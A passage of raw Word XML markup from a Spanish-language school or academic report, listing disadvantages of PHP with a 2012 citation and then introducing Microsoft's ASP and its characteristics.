    <w:p w:rsidR="00D01488" w:rsidRPr="00D37CC0" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37CC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El software que permite soportarlo en los servidores de hosting es libre y gratuito.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D37CC0" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37CC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Está en continuo desarrollo y soporta numerosas funcionalidades.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D37CC0" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37CC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Existe numerosa documentación sobre el lenguaje en Internet por lo que es relativamente sencillo resolver los problemas que nos puedan surgir durante el desarrollo de un sitio web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D37CC0" w:rsidRDefault="00D01488" w:rsidP="00D37CC0">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00964563">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00964563">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Desventajas</w:t>
      </w:r>
      <w:r w:rsidR="005E32CE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00584878" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584878">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para poder ver y testear las páginas que vayamos creando es necesario disponer de un servidor web que soporte PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00584878" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584878">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Al ser interpretado en el servidor, es más fácil que se colapse cuando el número de peticiones de descarga de páginas aumenta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00584878" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584878">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Parte del contenido de las páginas puede no ser accesible a los navegadores, dificultando el posicionamiento de las páginas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00584878" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584878">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Todo el trabajo lo realiza el servidor y no delega al cliente. Por tanto puede ser más ineficiente a medida que las solicitudes aumenten de número.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00584878" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584878">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La legibilidad del código puede verse afectada al mezclas sentencias HTML y PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00584878" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584878">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La orientación a objetos es aún muy deficiente para aplicaciones grandes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00584878" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584878">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Promueve creación de código desordenado y con un mantenimiento complejo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00584878" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584878">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>No posee adecuado manejo de Unicode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00584878" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584878">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es muy difícil de optimizar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584878">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Diseñado especialmente hacia un modo de realizar aplicaciones Web que es problemático.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:id w:val="-1815399066"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00584878">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00584878">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Jim12 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00584878">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:noProof/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:noProof/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t>(Jiménez Flores, Oscar, Méndez Vilchis, Mario Alberto, Montero Márquez, Andrés, Morales Vilchis, Diana &amp; Velasco Esquivel, Victor Ernesto, 2012)</w:t>
          </w:r>
          <w:r w:rsidRPr="00584878">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="008A66D1" w:rsidRDefault="008A66D1" w:rsidP="008A66D1">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A66D1" w:rsidRDefault="008A66D1" w:rsidP="008A66D1">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A66D1" w:rsidRDefault="008A66D1" w:rsidP="008A66D1">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A66D1" w:rsidRPr="00584878" w:rsidRDefault="008A66D1" w:rsidP="008A66D1">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="786"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00EE1277" w:rsidRDefault="00D01488" w:rsidP="00EE1277">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1277">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ASP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00EE1277" w:rsidRDefault="00EE1277" w:rsidP="00EE1277">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1277">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6338798E" wp14:editId="089C1D2C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1804860</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>95885</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1760220" cy="1760220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="8" name="Imagen 8" descr="Resultado de imagen para A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AS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60220" cy="1760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01488" w:rsidRPr="00EE1277" w:rsidRDefault="00D01488" w:rsidP="00EE1277">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00EE1277" w:rsidRDefault="00D01488" w:rsidP="00EE1277">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00EE1277" w:rsidRDefault="00D01488" w:rsidP="00EE1277">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00EE1277" w:rsidRDefault="00EE1277" w:rsidP="00EE1277">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D01488" w:rsidRPr="00EE1277">
        <w:t>El lenguaje ASP se trata de un lenguaje de programación web desarrollado por Microsoft en 1996 para poder crear sitios web dinámicos. Como el PHP es un lenguaje interpretado en el lado del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00964563">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Características</w:t>
      </w:r>
      <w:r w:rsidR="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ASP es totalmente gratuito para Microsoft Windows NT o Windows 95/98.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El código ASP se puede mezclar con el código HTML en la misma página (no es necesario compilarlo por separado).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El código ASP se puede escribir con un simple editor de textos como el Bloc de notas de Windows o UltraEdit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cómo el código ASP se ejecuta en el servidor, y produce como salida código HTML puro, su resultado es entendible por todos los navegadores existentes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Mediante ASP se pueden manipular bases de datos (consultas, actualizaciones, borrados, etc.) de prácticamente cualquier plataforma, con tal de que proporcione un driver OLEDB u ODBC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ASP permite usar componentes escritos en otros lenguajes (C++, Visual Basic, Delphi), que se pueden llamar desde los guiones ASP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sin modificar la instalación, los guiones ASP se pueden programar en JScript o VBScript (este último es el más usado porque más programadores lo dominan), pero también existen otros lenguajes, como Perl script y Rexx, que se pueden emplear para programar ASP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00C131F2" w:rsidRDefault="00D01488" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C131F2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Se ha portado a la plataforma Java por Chili Soft y Halcyon Software, lo que permite que ASP sea usado en casi cualquier sistema operativo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00D01488" w:rsidRDefault="00D01488" w:rsidP="00D01488">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01488" w:rsidRPr="00964563" w:rsidRDefault="00D01488" w:rsidP="00964563">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964563">
